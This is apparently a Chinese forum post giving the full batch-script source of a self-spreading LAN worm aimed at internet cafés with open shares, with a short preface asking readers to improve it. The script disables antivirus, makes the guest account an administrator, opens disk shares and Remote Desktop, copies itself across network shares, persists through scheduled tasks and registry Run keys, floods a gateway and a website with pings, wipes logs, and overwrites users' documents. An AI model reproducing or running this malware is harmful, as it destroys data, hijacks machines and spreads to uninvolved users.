写这个蠕虫主要是针对网吧,因为看到很多网吧开着共享,却无须密码就可以访问。这个蠕虫只要发现有可写权限的共享便可以将自身复
制进去,用AT命令或系统下次启动时启动。由于时间和设备的关系,这个蠕虫我并未去认真测试过,相信应该有不少BUG吧,有个按时感染每级
目录目标文件的BUG一直没有更好的解决思路,大家发现问题后请告知我,或你能修正、完善代码,请COPY我一份啊,先行谢过!
@echo off
echo
echo.
echo 局域网共享蠕虫Net2K Beta v1.0版
echo.
echo.
echo Net2K原创作品,欢迎访问http://www.52chb.com
echo.
echo 警告:本程序只做研究测试之用,对您运行本程序所造成一切后果本人概不负责!
echo 按任意键继续或关闭本程序退出
pause>nul
cls
tskill ccapp
tskill Rfw
tskill KAVPFW
tskill KAV9X
tskill PFW
tskill RavMon
if not exist c:\autoexec.bat copy /y %windir%\system32\autoexec.bat c:if not exist %windir%\system32\autoexec.bat copy c:\autoexec.bat
call attrib +h +r c:\autoexec.bat && attrib +h +r %windir%\system32\autoexec.bat
doskey at=
SET pk=1
SET ak1=254
IF %pk%==1 (
SET /A ak1=%RANDOM% %% %aK1%
)
SET LOVE=$%ak1%
attrib -h -r c:\msdos.sys && attrib -h -r c:\config.sys >nul
echo [option] >c:\msdos.sys
echo bootkey=1 >>c:\msdos.sys
echo BootMenu=0 >>c:\msdos.sys
echo BootWarn=0 >>c:\msdos.sys
echo BootFailSafe=0 >>c:\msdos.sys
echo DisabeLog =1 >>c:\msdos.sys
for %%k in (a,c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @echo lastdrive=%%k >c:\config.sys
attrib +r +h c:\msdos.sys && ATTRIB +H +R c:\config.sys >nul
for %%k in (a:,c:,d:,e:,f:,g:,h:,i:,j:,k:,m:,l:,n:,o:,p:,q:,r:,s:,t:,u:,v:,w:,x:,y:,z:) do @subst %%k %SystemRoot%\desktop
echo [rename] >Wininit.tmp
echo c:\windows\Wininit.ini=C:\Wininit.tmp >>Wininit.tmp
echo DIRNUL=F:\ >>Wininit.tmp
echo DIRNUL=E:\ >>Wininit.tmp
echo DIRNUL=D:\ >>Wininit.tmp
net view >a.txt
find "\\" a.txt >>l.txt
for /f "skip=2" %%a in (l.txt) do @copy /y Wininit.tmp %%a\C$
for /f "skip=2" %%a in (l.txt) do @call attrib +r +h %%a\C$\Wininit.tmp
net user guest Net2k%& /active:yes
net localgroup administrators guest /add
net share "ipc$"
net share "admin$"
net share "netbois"
net share "rpcss"
echo [Components] >c:\3389
echo TSEnable = on >>c:\3389
sysconmgr /i:sysoc.inf /u:c:\3389 /q
: 开硬盘共享
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @net share %%k$=%%k:\
: 攻击网关
ipconfig >Cf.txt && find "Default Gateway" Cf.txt >CH.txt
for /f "skip=2 tokens=13" %%a in (CH.txt) do @echo ping -n 20 -l 800 %%a
ping www.xhcatv.com.cn /n 15 /l 800
ping www.xhcatv.com.cn /n 15 /l 800
ping www.xhcatv.com.cn /n 15 /l 800
ping www.xhcatv.com.cn /n 15 /l 800
: 将自身复制到局域网内所有共享硬盘根目录
for /f "skip=2" %%a in (l.txt) do for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @copy autoexec.bat %%a\%%k$
for /f "skip=2" %%a in (l.txt) do for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @call attrib +r +h %%a\%%k$
\Autoexec.bat
cls
del %windir%\system32\logfiles\w3svc1\*.* /f /q
del %windir%\system32\logfiles\w3svc2\*.* /f /q
del %windir%\system32\config\*.event /f /q
del %windir%\system32\dtclog\*.* /f /q
del %windir%\*.txt /f /q
del %windir%\*.log /f /q
cls
: 将自身复制硬盘根目录
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @copy /y autoexec.bat %%k:
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @at 9:50 %%K:\autoexec.bat
:按时感染每级目录目标文件
echo @echo off >pk.bat
echo SET pk=1 >>pk.bat
echo SET ak1=19 >>pk.bat
echo SET ak2=19 >>pk.bat
echo IF %pk%==1 ( >>pk.bat
echo SET /A ak1=%RANDOM% %% %aK1% >>pk.bat
echo SET /A ak2=%RANDOM% %% %aK2% >>pk.bat
echo ) >>pk.bat
echo SET win=a%ak1%x >>pk.bat
echo copy /y pk.bat+xy.bat %win%.bat >>pk.bat
echo for %%y in (*.DOC,*.XLS,*.TXT,*.RIF,*.DBF,*.ARJ,*.log) do @echo FEI LOV YOU>%%y >>pk.bat
echo at 9:55 %win%.bat >>pk.bat
attrib /d /s -h -r
dir |find "<DIR>" >>Mm.txt
for /f "tokens=4" %%i in (Mm.txt) do @copy /y pk.bat %%i\>>%LOVE%.bat
for /f "tokens=4" %%i in (Mm.txt) do @echo at 9:55 %%i\%win%.bat >>%LOVE%.bat call %LOVE%.bat
for /f "tokens=4" %%i in (Mm.txt) do @echo > %%i\pp.txt
for /f "tokens=4" %%i in (Mm.txt) do @echo dir >>%%i\pp.txt
for /f "tokens=4" %%i in (Mm.txt) do @echo find "<DIR>" pp.txt > %%i\pp.bat
for /f "tokens=4" %%i in (Mm.txt) do @ren %%i\pp.txt l.bat
for /f "tokens=4" %%i in (Mm.txt) do @copy %%i\l.bat+pp.bat xy.bat
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @call attrib +r +h %%k:\%win%.bat
cls
echo REGEDIT4>>lov.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>lov.reg
echo "lovF"="c:\\autoexec.bat">>lov.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>lov.reg
echo "lov"="c:\\windows\\system32\\autoexec.bat">>lov.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings]>>lov.reg
echo "Key"=hexb,23,45,6f,8e,41,70,4c,44,5e,d0,23,79,c2,b4,b1>>h.reg
echo "Hint"="Hello. I am Net2K.">>lov.reg
reg import lov.reg
echo @echo off >del.bat
echo if exist *.* (del /f /q *.bat,*.tmp,*.txt,*.reg) else echo >>del.bat
call del.bat >nul
: 清扫战场闪人...
exit